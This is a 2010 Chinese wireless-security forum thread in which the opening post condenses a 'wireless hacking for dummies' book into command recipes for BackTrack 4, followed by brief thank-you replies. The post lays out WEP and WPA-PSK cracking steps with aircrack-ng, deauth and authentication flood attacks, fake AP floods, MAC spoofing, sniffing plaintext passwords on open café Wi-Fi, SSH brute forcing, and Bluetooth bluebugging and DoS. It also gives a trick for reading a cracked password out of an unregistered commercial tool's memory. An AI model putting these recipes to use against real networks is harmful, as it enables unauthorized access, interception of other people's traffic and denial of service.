格西欧解决方案
树熊
查看: 9743|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Rippleos
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。- E8 B# G& }0 a! K* n

2 K  ]2 L1 a; q. {+ ]以下所有操作均在BackTrack 4中进行。5 Z+ E- m5 Y2 N( ~3 |+ Q2 m! g
! ^# G% x0 m& U  I4 i$ w; r

5 `8 a( l0 ~' Z4 f无线WEP加密P解:
; B7 F* n  \% V6 O4 m4 x! ~; U% Q/ X
注入P解:
- q8 N' r( y4 |0 r5 ]" |, u. o' z4 ~/ l4 }
ifconfig
0 A0 x5 |" g- u2 |$ h) ]% F
# r% L9 T6 ~0 u, i% Qifconfig –a
- O2 r: r, p+ i2 d1 F' G0 `& P7 |% t" V' E
ifconfig wlan0(无线网卡) up
8 F" |1 z2 z/ E  F
9 a$ U* X- Z# Wairmon-ng start wlan0
8 P4 R& o; o; g3 f# j' d; N( n
" J  ?5 R8 X) I( S1 pairodump-ng mon0# v. W. `* f7 r% Y, H8 I9 [

( m, i) Q: l# g" X5 D$ L" gairodump-ng --ivs –w ivsfile –c 频道 mon0或
* v1 I0 n& D% u, P
7 @4 q8 P3 T6 a: i' ?airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
! {4 x+ o/ ?% P9 O9 G" ~# T7 n) F' w% i4 K: `( v, l
aireplay-ng -3 –b BSSID –h Station mon04 P5 l, B' ^7 S* Z( ^7 h+ t2 I

6 M+ Z% h0 B  X$ o" t) @. kaircrack-ng ivsfile-01.ivs
. ?+ f% `! m& t8 x4 Q) o+ X& u, }5 c! r! H( a0 e5 Q" m- T
虚连接P解(适用于无客户端连接APP解)
$ L  A: l! l+ S* n: j
8 Z) i# F; M9 o+ g1 N2 G% ^. Pifconfig/ u  {% a: U( _% w9 Y
& {# M) M! E1 `2 F5 J6 s# M$ D* @
ifconfig –a
6 b+ P4 X/ T5 l. p
( E! a! l7 c' V; n, b+ k3 r8 q$ Uifconfig wlan0(无线网卡) up
4 o7 y9 f& h% N6 p; O/ i% R  l4 r7 X2 h
airmon-ng start wlan0
" ?9 e+ i" G6 `' b
9 _' z: k$ |. J" [0 wairodump-ng mon0
6 n0 V/ v5 v9 a/ F
6 t5 [# X7 @; I* fairodump-ng --ivs –w ivsfile –c 频道 mon0或
, {' l. R. [: V- b% d" H7 \5 L/ y& U2 m1 Q% v' h, S7 D2 o, D
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
/ i7 j  ~) s- W: ^8 ?5 f
, n4 O9 g8 T; K% }* }aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0  ?6 h5 o' Z+ B/ V2 ~; Z. C# G
' l! `" w8 H+ R: ?+ r/ h7 k. M
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon00 U( c% A( j' I% x
, E6 T7 R7 j6 i$ P- Y
aircrack-ng ivsfile-01.ivs' m1 `3 f0 o  y) U5 \3 s

0 e( D& \# v- q/ h
; I. d1 A: j" `还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。. {3 B4 X' s' D. ~

' ]9 F, ?8 y1 n: ]# Q5 l  S3 A2 Z- \% n7 a
WPA-PSKP解, H7 M3 e5 |# c+ o$ Y. ^+ S
9 S3 `' N8 a, }  x, g
ifconfig! M8 x; W( Q- N: O
# _- n+ d: q% c8 t& n+ R0 c& s9 I
ifconfig –a# k. ^% I& _! M2 Z; f9 x5 `

, G+ x) J5 G/ ]* A* _- Aifconfig wlan0(无线网卡) up
1 X! g* n5 X7 A. a$ R8 U! |5 ?# W" `
4 u% V! q  D6 w7 y% Hairmon-ng start wlan0) h9 i, w( B/ U. d7 t9 [8 Y: u
9 m! R9 ^7 P+ W4 V' U
airodump-ng mon0
( h" B0 C% h2 B2 B9 U/ m! H6 ^0 A3 l2 q" E# ]* f$ M) `0 v
airodump-ng –w capfile –c 频道 mon0
# l6 q# x) Q5 M
: |7 j' a4 O  _& }: m4 Daireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包6 k* n0 u3 ]6 z8 ~3 T$ \

3 ^3 c: h/ J8 d# \, Saircrack-ng –w Dic capfile-01.cap或
5 f# u/ m$ t! u- e  d) b3 e# a3 b& P
7 J$ c1 d: I: K, z& ycowpatty –f Dic –r capfile-01.cap –s SSID
3 i) t( }5 o, g9 M( e
( g, `! `9 L1 V' Pcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID; A8 J% M3 Q/ @% O: L

! y/ x- ^) K+ q6 e+ j% D; i傻瓜式P解软件SpoonWPA。
6 V. l1 _: |, ^5 l
$ c1 o; M& a# r! a$ n. t! {; a8 MBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst1 u6 K- o8 Z' a; _* s
0 w. b# D% \8 s/ h& B7 G1 Y

* p* k( l; T7 v( K字典文件的生成和上传
4 W9 f& u2 l8 S/ x
2 k& v6 `. c- R: A% |在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。) v, x: }1 [, e, ~+ O; H& N" D

# j9 d) a" Z9 r7 u: I. t0 T+ A! s0 A% |; S, h& u& v; u# L8 j
BT4下开启Tftp:Services—TFTPD—start TFTPD1 @3 `( B2 a# }, c# X
& E) a  `4 ?9 t! e) E' D8 d
在Windows的CMD中运行 tftp –i IP put **.dic: h" w' i  J! e7 a; {( a4 p9 A
; s; [1 d' E4 J* G" q
- D) `3 ]" o: @3 p* V% g1 g6 ^
BT4下开启SSH:Services—SSH—start SSH
8 X8 i/ Q3 G5 O1 S
* q2 W1 F  ~" F; A  K* u" tWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
6 G+ v  o' @6 d* N# [
0 g& r) y4 x1 O. z' {3 D- y6 E: ?$ V2 t) v
AP限制MAC时的解决
$ y2 k8 c1 a6 O, ^5 U- b8 ~9 J* L' K: r& Q! ~. x: H; {9 c
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
: K! }6 V2 k* K% F/ ]' ~2 n) Y/ }& m% r7 ?; A  c/ x( s6 {: K* b
ifconfig wlan0 hw ether NewMAC
0 x9 H8 N# w5 D2 o- `& E5 M) l
" o& J: {) H/ g( R1 M
关闭SSID广播的AP探测:6 t4 k: S) g( w- U5 k$ h8 |0 Z% w
# F, o4 r9 A- |$ M' M" Y% Q
1.     Deauth攻击:
" s4 t' X: x3 \
; ?5 z9 G. U+ V7 @# qairodump-ng mon0! S6 d* I! h6 H; A4 l3 }+ Y

6 ?7 }& g. ~- Z% ?1 C- W' n) Haireplay-ng -0 10 –a BSSID –h Station mon00 f% X5 p6 C4 b' M/ j, p2 Z
% l" C* i9 O) V( K8 O
2.     抓包分析
9 z3 G# X3 v; o# A8 c
! G. f9 K) R" B8 Z( o/ t8 FOmnipeek; w1 ~7 v7 \- u" n/ [) I* e5 l
" ^5 C7 N# o! M8 \* A
Tcpdump –n –e –vvv –i 网卡名, S$ f/ l7 r+ G

! W( n* N: c! d3 [8 C4 ~; B3.     暴力P解
: W1 S% G- \1 ]2 U- \( V- a& S# R/ o2 ^$ g+ G# }* u
Charon 1.1暴力P解
, m, P) h& r9 T
, F. q& {: R& M# B. V( l1 P1 {3 `
无线加密数据包的解密
6 S0 I& k# x# z% X, Q. G! w$ c% m8 Q# J  [+ H. }" `
* L! y, I! f. l3 R
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。  q0 L1 t+ n; h4 d1 G7 E5 N

% S+ m$ p5 k" }4 D: h0 \. gFilterNS     DNS解析数据包
: G) f3 I, T& v3 O5 r' @: F0 v) L  ?+ ]$ x; m7 U! I
Filter:HTTP    WEB访问数据包
  P# v$ ?9 r8 R
9 t. I9 }5 F; B8 u/ o, ?Filter:msnms   MSN
5 b) h  J# c/ B6 x5 x6 e# ~5 }% g% @3 S6 @& ~" `7 T) L/ F
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
, z( d; m2 v/ a% }9 P7 z2 H# s; h. @" K3 a* m
使用airdecap-ng解密:6 W) ]4 ~  F' `7 [
. f( u! @8 t/ q" q7 V3 C) v
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap  S+ m$ g' c2 P
( \6 q, E" M7 @! o7 Y) P

# o0 D" J) u) j: j' C7 T咖啡馆中无线数据截取(开放式无加密AP)7 R3 `) |8 u2 N9 @
% `: F' m3 V$ z& h; K. G7 g- e% K% l
1.Airodump-ng –w data –c频道 mon0! {. }4 I1 M0 H  |+ P' Z
/ e! _: ?; v  }8 }" y' d
2.使用WireShark打开分析
+ H: K4 L" d( \( j1 ~
1 z' f3 M$ J* T+ t$ |1 @" x  R- o5 t3 d% k. f) A6 w4 M
BT4下的渗透工具:! ^. y9 v1 l1 I0 P/ y

5 ^$ ]9 v4 L" G. f$ F" S$ wnmap –sP IP/24        判断C段下存活的主机
2 o* c, P. G  B5 ^
+ d5 T6 Y4 z+ r  A& a6 u$ f% q3 ^nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放, }4 G# G- J! l2 f+ Y6 `

% ^# M6 |6 u! s7 @9 R) \nmap –vv –sV IP –p port   指定端口的详细信息。。。
* @5 E: p* w, n! d2 W- t- _; g; g1 R+ T6 [2 k! N
namp –O IP/24    判断主机的系统版本4 z: c, m% `3 [1 R: P
; }" Y- o" W" W  \
( z# K6 w( Q' k4 D: A
GUI 版nmap:Zenmap 3 [+ u8 _6 n9 P0 P5 d
, I/ Z8 t! m7 e. \" ~2 C
2 r; o- U9 i0 k# r0 C! G
Amap使用:amap –B IP port
1 }) ~$ s7 M8 E+ V( M2 B" p9 W& t+ I! w
Nbtscan(扫描Windows网络NetBios信息):7 P0 @( C) ~7 J' k9 ^

2 G' p" ?& @+ d( ]nbtscan –v –s : IP/245 `2 K. K6 R3 A/ i5 g* ~  z) s% a

7 L# I3 v& K  |+ Wnbtscan –r IP
: C+ o* t& G, j+ v9 W5 ?. E3 X1 G: j2 |6 ^
9 {7 e8 y) x4 O# g4 ?$ y& E
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
, P. k9 U7 J* v( X/ g; `5 t8 r: l3 W9 S+ e3 X' A* [& ?4 y% W
" b6 Z7 M/ l' M
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
, D7 L- m$ ^" S7 n6 t! {: n1 y3 v- I( S5 b
BruteSSH: ./bruthe.py –h IP –u Username –d Dic7 ]4 \  f& B* M- t) ^
/ X7 a( C& b) F- [$ Q
Metasploit3使用0 W- X/ c1 p* W0 y
无线D.0.S
' ?7 t9 B' {) s: k# [) I4 v, f  N  e' I# ]2 _6 Z: H" }1 o
. F8 X7 q1 }& z/ _% j+ {
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击), h( d6 M  e: X& }% X. X
# U7 q- }! b' ^' y( u
airmon-ng start wlan0& N  ]: Y8 @% f5 l) ^

' t# l' i" e" Y+ c9 k( C" oairodump-ng mon0
4 \1 U) N) Z1 Y  f0 r5 T
3 [% R6 m3 ~" h$ B) ?  s! rmdk3 mon0 a –a BSSID
( k$ e- g8 p, W$ ?3 U+ ^: W' P6 s
: }) Z! K( H% A+ x8 Q! t3 l对所有的AP攻击:mdk3 mon0 a2 D! D% i7 M" D  t9 {: x. r( {

& W6 b! Q' }0 M* ]1 ?, V0 G* `1 F" _; _+ P, j
Deauth Flood 攻击, ~% m# I6 u" |& H

1 H+ j6 b! R& `, p- `3 emdk3 mon0 d –c Channel) I1 I+ I6 m* M# F+ ^" q+ R/ g# M
1 S1 T, U. ~' S/ \) R2 ~
图形化D.O.S攻击:Charon
: l8 ?( [& K& A1 k/ O
' r  X1 z( L3 V/ T  i7 U/ w# }5 `/ x1 c" y9 y9 N/ X. e+ r1 _; A
当受到攻击时,使用Wireshark抓包可以看到异常信息。
  |; ~% E. u' @4 m" E7 m  I  e8 V% y% p. t; E, D  ~

- u- A& |* Z! w3 K) Q' r+ ^. YWPA-PSK高速P解
/ k5 z* R7 F' t, P3 \" ^( w% m1 q5 C5 u; C# h
1.       WPA-PSK PMK Hash TablesP解
# e& r4 W0 b- c3 A% _
4 e- i/ y( C: {: _Cowpatty –d HashTable.hash –r ***.cap –s SSID+ E- Z0 l" e/ A& i% v, C
6 K* M8 o. L1 r
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID" r+ r9 j# v& ?

6 j! \! K: t7 p  C2.       GPU辅助高速P解
' q- i  \, ]% E  f5 N8 I+ x& \- q4 x
( j4 ~/ @; i& P. y1 V* t使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
* q1 j8 ]% _! B# \4 L. `* k* t+ a- E9 p4 R$ ?7 B
3.       分布式P解/ \3 ]& I! s+ t6 K7 X( D; C: p
# B  a9 L: r( {6 @# J% ~% {& h

- q8 C5 \1 L' B+ G6 ~+ @  C* xAP的伪造
( Q7 X- ^6 T4 t9 N2 T, J0 C8 g0 G7 V& x! J- s# t) R
把AP的MAC改成目标AP的MAC  N' h8 a% c6 G" G) o& f' w" v
0 e& w. s; r6 `
网卡软AP" D; F  y0 s" G! n4 T) m# M

5 u( l. g9 S! Q3 O/ b& |- B
& {3 |1 I4 m. D) o' u' k& g伪造大量虚假AP信号:3 s% r- M% n) D8 A

4 u% B6 p* K9 N4 i' X, x; o. Y随机SSID:mdk3 mon0 b –g –c 频道
7 I/ Z! U) N+ L# R+ D- a
! K8 p6 [) q3 ~( Y% V指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
) l7 L  u% d  U- n
% r! @% l% J. p1 v
. A. y5 y' A* h& bWar-Driving( E, u: U- Z; q1 N- \. c( Q2 V
& |4 A! ~  V( \1 H1 V; @
热点地图绘制% d0 Q$ a, r' m, n# T! `% F( }/ b
  t0 q) ^$ z0 N- q( J+ U
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。' U, U* g1 x$ X2 k! U
7 b5 L1 m/ _, w6 d6 c5 k5 n
" ?. ]* p- \$ \3 E" l1 g
Netstumble3 n  Z3 u) |2 |& f. ^4 V" s/ U) y

, u8 N* z( v3 z8 X( T3 h$ U4 c( [: _# R$ t; {5 F0 z
蓝牙Hacking9 U( f; s. t# k; o% i7 x) ^

/ y4 ~0 u$ Y. t' M+ q9 nWindows下的Blue Soleil工具' s1 q6 U; u- O  |

' y& C+ T9 a+ x6 W5 SBT4:: o9 x  V; o5 \* a$ N. e
2 Z* C+ `1 q% G8 `' i. R
hciconfig 查看蓝牙适配器
9 H: o. p6 B6 @2 `* W8 N( ?+ F3 G# r2 x% M0 H, ]
hciconfig hci0 up 载入蓝牙适配器$ M: ?  n2 E" M8 p$ h8 I' d
2 g$ R" ?) Q" |0 M# N  j
hciconfig hci0 class 蓝牙适配器详细信息* x, B: }2 q! R2 l: r

9 K5 B6 `0 B7 j  ^1 N8 i/ ]6 ~
3 ?: `3 o* E1 w  q+ }. fhcitool(扫描蓝牙)+ T- b5 W8 a# e, ?7 i
2 r1 h# k  ?, t1 O/ @
hcitool –i hci0 scan1 V1 T( e+ J2 h- p6 u

4 z4 Y- T& g9 x0 u9 y: w! s4 `BTscanner(扫描蓝牙)
/ `6 t& A3 a$ q$ {
. V7 q0 Q, q+ n" n5 W/ d+ ~, J: e4 S; j6 f! @$ d
蓝牙攻击:( Z7 ?8 @% ^9 |' M8 x

2 B) {; @) Z0 P" |( h- VBlueBugging (适用于BlueTooth V1.1的手机)
) A( n/ s0 {9 S
( b+ `+ I& U& q( P$ aBluebugger工具:
: g% h, n6 t, W8 k% V7 m( M% E: J) C
: g# G0 U0 A$ V1 Q& E+ `# U$ aBulebugger –a HD_Addr info1 O% ~$ X1 d4 a# x

6 L# {- v2 u, F1 S  U0 y1 @& l1 j: @2 U
BlueJacking8 |% j) Y) [3 a% B: M

7 X% S/ R# j: N( q+ j实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。0 a6 v1 m, s0 W. @" B7 a5 n' e
& u9 e0 `9 d/ }& U

  m/ S5 G& X; A5 }HD_Addr修改:0 Q( E" `  D4 a% s( u2 t
% E; s& R3 ]9 [* l4 a* |
Bdaddr工具1 E" H& Z3 O: b& [
* E4 q8 i- y$ T6 }, ~: q+ J6 L3 E& \
bdaddr –i 蓝牙设备名 新HD_addr
) h, u. ^4 N8 W
$ {9 y* g; N6 ^- R
* U! d6 Q) k8 d$ F; T蓝牙D.O.S
, E' I0 O( z, N6 l5 i
2 p6 u1 [9 l6 }0 pl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
$ V% c/ a1 K- U) k- o0 R! L' h, p6 d. D/ r3 C
hciconfig  L  T2 B* x; h  e4 B
4 J% t$ ]& g8 K
hciconfig hci0 up$ m, k; P5 i- C7 z
" \/ E$ N% u% @, Y3 Q
hcitool –i hci0 scan" C1 y6 T8 b  K$ X/ h& X+ R

3 x& }1 l  t4 ~8 @8 ul2ping –s 10000 –目标MAC: y$ l' g3 F$ Y3 G# [

0 C  G. M6 @7 [3 ~! e7 q5 l( t2 {4 Q# `* k# e& {
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)0 ], ~( ~5 `6 M0 g
7 Z4 V* [+ M) D# N- e+ ]5 E& Y
./fang –r ************-############ -s- U; K; L: N3 t
% p0 V* }/ ~6 a4 x) G+ F; o
暴力P解************-############的蓝牙设备
0 N- M1 n5 B! G' Q6 W9 G/ L3 }% R
: z& x7 h+ \1 \" j1 I./fang –l 各厂商BD_Addr分配1 M" g- S' \4 z' j7 F( g6 B
6 j: N# j" r2 D* M# Y

5 p* x" |0 V# G" q# \7 WWifiZoo使用+ w: \3 k. z1 Y& V& t
* j8 O5 l. M( v! ?7 q
./wifizoo.py –c Capfile( a  N% y; O; r: B7 N, h. [$ v
" _  \5 Q; G$ q3 c8 [% h- S6 I
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

791

积分

中尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。% V: Q" x$ H) {: D0 {* a
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的* U' X. B( V1 j% x) s
呵呵 其实也不贵 21块 快递再一点
7 Q' R" `7 y+ T4 n4 z& x我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2015-9-5 22:12 , Processed in 0.496722 second(s), 34 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表